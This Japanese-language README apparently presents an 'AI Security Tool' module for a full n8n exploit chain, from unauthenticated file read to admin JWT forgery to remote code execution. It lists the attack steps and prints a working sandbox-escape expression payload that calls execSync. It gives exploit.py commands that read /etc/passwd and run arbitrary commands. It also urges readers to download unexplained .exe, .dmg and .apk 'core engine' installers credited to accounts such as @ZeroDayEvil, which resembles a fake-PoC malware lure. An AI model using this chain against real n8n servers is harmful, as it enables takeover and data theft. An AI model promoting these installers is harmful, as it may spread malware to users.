🛡️ CVE-2026-21858 + CVE-2025-68613 対応の公式 AI セキュリティツールモジュール(n8n「Ni8mare」未認証任意ファイル読み取り & 式インジェクション RCE フルチェーン)。
本モジュールは、n8n ワークフロー自動化インスタンスに対する診断ツールと完全なエクスプロイトチェーンを提供します。これは Ni8mare と呼ばれています。
この攻撃チェーンは、Content-Type の混同によって引き起こされる未認証の任意ファイル読み取り (CVE-2026-21858) と、認証済みの式インジェクションによるサンドボックスバイパス (CVE-2025-68613) を組み合わせたものです。公開されたファイルアップロードフォームに対して細工された Content-Type: application/json リクエストを送信することで、攻撃者は filepath 引数を制御し、内部システムファイル (/proc/self/environ、設定ファイル、SQLite DB) を読み取ることができます。取得した encryptionKey とパスワードハッシュにより、管理者 JWT Cookie をオフラインで偽造することが可能になります。認証後、this.process.mainModule.require を介した式インジェクションにより JavaScript サンドボックスを脱出し、任意のシステムコマンドを実行できます。
「ファイル読み取りからシステム全体の乗っ取りまで、わずか3ステップ。」
ファイル読み取りにはバイナリ出力を伴うアクティブなフォームワークフローが必要ですが、式インジェクションは特別なノードや明示的なシステム権限を必要とせず、デフォルトの n8n インストールで確実に機能します。
| 仕様 | 割り当て値 | 備考 |
|---|---|---|
| CVE 識別子 | CVE-2026-21858 + CVE-2025-68613 | フルチェーン: 未認証ファイル読み取りから RCE まで |
| 深刻度評価 | Critical (CVSS v3.1: 10.0 + 9.9) | 未認証 RCE チェーン |
| 脆弱性の種類 | CWE-200 / CWE-94 | Content-Type 混同 / コードインジェクション |
| 影響を受けるコンポーネント | n8n ワークフロー自動化エンジン | バージョン <= 1.65.0 (AFR) / >= 0.211.0 (RCE) |
| 修正済みバージョン | 1.121.0 (AFR) / 1.120.4+ (RCE) | ベンダーによる公式パッチがリリース済み |
| 必要な権限 | なし | 公開フォームを介した未認証の初期アクセス |
graph TD
A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
F -->|6. Execute Command| G[Full Remote Code Execution]={{ (function() {
var require = this.process.mainModule.require;
var execSync = require("child_process").execSync;
return execSync("id").toString();
})() }}1.121.0 以上に更新してください。N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true を設定し、Docker コンテナ内のプロセス権限を制限してください。⚠️ 重要: 本モジュールは、AI Security Tool エコシステム内での安全な実行と診断のために特別に構築されています。常に公式リポジトリから取得した検証済みのモジュールを使用してください。
監視および診断スクリプトを実行するには、AI Security Tool コアエンジンがインストールされていることを確認してください:
| OS / プラットフォーム | バージョン | アーキテクチャ / 形式 | リリース日 | ステータス | ダウンロードリンク |
|---|---|---|---|---|---|
| 🪟 Windows | v6.3.20 | x64 インストーラー (.exe) | 2026-09-08 | 🟢 最新 | .exe をダウンロード |
| 🪟 Windows | v6.3.20 | x64 ポータブル (.tar.gz) | 2026-09-08 | 🟢 最新 | .tar.gz をダウンロード |
| 🍏 macOS | v5.3.29 | Apple Silicon M1/M2/M3 (.dmg) | 2026-09-05 | 🟢 安定版 | .dmg をダウンロード |
| 🐧 Linux | v5.3.27 | ユニバーサル x64 (.tar.gz) | 2026-09-01 | 🟢 安定版 | .tar.gz をダウンロード |
| 🤖 Android | v8a 5.3.27 | ARM64 APK (.apk) | 2026-09-01 | 🟢 安定版 | .apk をダウンロード |
# Read arbitrary file via diagnostic module uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwdExecute full attack chain with custom command
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"
コミュニティによって維持されている脆弱性スキャナモジュール、PoC スクリプト、研究リポジトリ:
5 モジュール@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayVPN
3 モジュール@ZeroDayEvil
@ZeroDayVPN
@ZeroDayEvil
2 モジュール@ZeroDayEvil
@ZeroDayVPN
このツールおよび技術分析は、許可されたシステム監査、研究、およびペネトレーションテストのために厳密に提供されています。
許可されていないターゲットに対してエクスプロイトチェーンを実行することは違法です。作者は、不正アクセス、データ損失、またはシステム障害に対して一切の責任を負いません。許可された範囲内でのみ操作してください。
セキュリティ研究コミュニティからのコントリビューションを歓迎します! 主なコントリビューション分野:
AI Security Tool — サイバーセキュリティ専門家のためのターミナルワークフローと自動化を再構築する。